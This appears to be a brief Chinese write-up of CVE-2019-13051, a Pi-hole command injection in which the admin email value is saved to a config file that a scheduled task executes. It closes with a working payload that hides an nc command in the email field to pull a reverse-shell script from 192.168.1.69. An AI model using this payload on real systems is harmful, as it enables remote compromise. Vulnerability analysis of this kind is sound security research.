https://github.com/Mr-xn/Penetration_Testing_POC/tree/master/CVE-2019-13051
命令注入挺常見的,不過他這個地方的觸發方式還挺少見。
管理員登陸之後有個修改管理員郵箱的地方,寫入的值會被保存到配置文件/etc/pihole/setupVars.conf
同時有個計劃任務,每十分鐘會解析並執行一次這個配置文件。
代碼裏面也只是對郵箱地址的格式做了簡單的過濾和檢查
"`nc${IFS}192.168.1.69${IFS}4444>/tmp/revshell.py`"@example.com